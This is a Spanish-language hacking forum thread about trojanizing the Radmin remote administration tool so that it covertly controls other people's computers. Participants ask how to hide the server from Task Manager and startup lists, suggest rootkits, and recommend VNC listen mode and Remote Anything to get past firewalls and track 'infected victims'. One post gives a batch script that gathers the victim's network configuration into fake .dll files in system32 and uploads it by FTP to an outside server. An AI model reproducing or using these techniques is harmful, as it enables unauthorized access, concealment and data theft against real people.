Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 1 Visitante están viendo este tema.

carlipus

#70
Si no te entendido mal, es si no se puede configurar desde Telnet remotamente, configurarlo por http, pues si el puerto 80 está abierto, tan solo tendrías que poner en tu explorador de Internet, http://IP
Es igual que cuando accedes a tu Router a través de http.
Y hay te saldrá contraseña y password del Router, y entras, por Http, resulta más fácil configurar.

Saludos

Zool

Muchas Gracias Carlipus, me sacaste la duda  ;D


scar_face

Hola a todos y gracias por acernos la vida asi de simple jeje, pero.... como podria hacer para q el r_server aparezca como aplicacion de sistema y no como aplicacion de usuario en el administrador de tareas por q asi solo le dan matar proceso y chau conexión, y tambien como hacer para q no aparezca en el msconfig el inicio de nc y del radmin server camuflageado, si alguien tiene alguna sugerencia o algun material para ilustrarme en este asunto por favor publicarlo aqui asi no sea yo solamente el beneficiado si no todos lo lectores de este foro ok.
Weno un saludo a todos y hasta la proxima.

tRekU

xdd

Pues no he leido el hilo, pero si has seguido los pasos, el radmin se te habra instalado como servicio en la makina en cuestion, lo que quiere decir que en el proximo reinicio sera lanzado como system..

Salu2

P.D.: Anelkaos (Ocultar Remote Administrator 2.1 de la lista de servicios). Rootkit, se que se puede cambiar el nombre pues alguno me encontrao pero a saber, tocando el registro imagino que se podra igual .. pero amos .. root, y adios proceso, servicio y puerto .. XDD

leprox

Para saltear los routers/gateways ,lo mejor es usar VNC en "listen mode" donde el puerto "escucha" es el nuestro y no el de la victima , por ende nos vamos a poder conectar donde queramos.
Otra opcion es el Remote Anything , el cual mediante una herramienta que se llama "directory server" nos va actualizando todas las victimas que se van infectando , de la misma forma que el vnc , en mode "listen" donde la conexion la establecen ellos hacia nosotros en el momento que ejecutan el server. yo lo uso , y no necesito reverse shell , netcat , ni nada para saltear fierewalls , es MUY recomendable.

ibiza-tdi

K onda;
Oigan hize el tutorial al pie de la letra...Ya la victima tiene guardado todos los arhivos...Pero al intenar conectarme con ella Me dice k el Password es incorrecto...Y cheque el .bat y todo esta bien para k el password sea 123456 k pasara?

Saludos
Ibiza-Tdi... 8)
CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN

Paya_pollo

hola a todo el mundo, gran tutorial por cierto, pero alguien sabe como quitar una proteccion que tiene el messenger, que borra el archivo automáticamente?, Gracias

debion

Buenas a todos,

he estado intentando troyanizar el radmin 2.2 , programando y compilando un archivo en C q ejecute unas instrucciones en cmd.exe .

El caso es q ésta nueva versión de radmin no incluye la opción de introducir la pass durante la instalación por línea de comandos.

Probando en una LAN he conseguido todo menos colocar un password imprescindible para conectarme al remoto.

Saben de qué manera podría incluir la pass en la instalación desde la línea de comandos y, si es posible, activar la opción HIDE para q desaparezca de la barra de herramientas ?

Gracias por anticipado y un saludo.

PD: Gracias a todos los q dia a dia colaboran en ésta web que tanto nos enseñan a principiantes informáticos como yo, facilitandonos en todos los casos la manera de aprender y comprender todo el entorno.

Venerato et erit veneratum

firewer

#79
Buenas he probado el siguiente codigo de la pagina 2 y me sale un error que no logro resolver.

@echo off
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo firewer >>C:\WINDOWS\system32\Win32el.dll
echo mipassword >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll ftp.usuarios.lycos.es


Me devuelve lo siguiente: (el pass y el usuario q pongo son correctos)

Conectado a ftp.usuarios.lycos.es.
220 212.78.204.234 FTP server ready
Usuario (ftp.usuarios.lycos.es:(none)):
331 Password required for firewer.

530 Login incorrect.
Error al iniciar la sesión.
ftp> put C:\WINDOWS\system32\win32ip.dll victima.txt
530 Please login with USER and PASS
530 Please login with USER and PASS
ftp> QUIT
221 Goodbye.

Ai algo mal?

Por cierto esto:
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll

Solo da la ip privada del pc, como se hace para la ip publica?